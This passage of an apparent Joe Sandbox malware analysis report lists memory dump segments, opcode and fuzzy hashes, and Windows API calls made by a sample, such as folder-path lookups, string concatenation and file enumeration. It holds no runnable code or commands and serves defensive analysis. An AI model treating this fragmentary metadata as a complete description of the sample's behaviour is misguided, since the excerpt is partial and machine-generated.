                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                        • String ID:
                        • API String ID: 300741435-0
                        • Opcode ID: 3da7c92f7d12e9ac2b8e438e33024c457f39d726f4aab065f84ed1da2dc95e3b
                        • Instruction ID: dd4b39f02b441be28214681587bea6647493bd010ed854e5f8de7dda543a2b73
                        • Opcode Fuzzy Hash: 3da7c92f7d12e9ac2b8e438e33024c457f39d726f4aab065f84ed1da2dc95e3b
                        • Instruction Fuzzy Hash: 39F096329037949BDBA0BFBA9806B9E33A36F00735F21514DF404A62D2CB645942DE5E
                        APIs
                          • Part of subcall function 006E8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006E8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 006E4F7A
                        • lstrcat.KERNEL32(?,006F1070), ref: 006E4F97
                        • lstrcat.KERNEL32(?,00E49258), ref: 006E4FAB
                        • lstrcat.KERNEL32(?,006F1074), ref: 006E4FBD
                          • Part of subcall function 006E4910: wsprintfA.USER32 ref: 006E492C
                          • Part of subcall function 006E4910: FindFirstFileA.KERNEL32(?,?), ref: 006E4943
                          • Part of subcall function 006E4910: StrCmpCA.SHLWAPI(?,006F0FDC), ref: 006E4971
                          • Part of subcall function 006E4910: StrCmpCA.SHLWAPI(?,006F0FE0), ref: 006E4987
                          • Part of subcall function 006E4910: FindNextFileA.KERNEL32(000000FF,?), ref: 006E4B7D
                          • Part of subcall function 006E4910: FindClose.KERNEL32(000000FF), ref: 006E4B92
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                        • String ID:
                        • API String ID: 2667927680-0
                        • Opcode ID: 3b1064b01646b948b7a2d0b291500b465781b9a9e9481e26ce432f5738a0e2fb
                        • Instruction ID: d8764edbdc2a77690eaaafcffcdfb1113beecee54ffcda460dd5cc58cba0643b
                        • Opcode Fuzzy Hash: 3b1064b01646b948b7a2d0b291500b465781b9a9e9481e26ce432f5738a0e2fb
                        • Instruction Fuzzy Hash: 3A21FDB6A153086BC754F7B0DC46EED333EA754300F008548B65957182EE749EC9CB96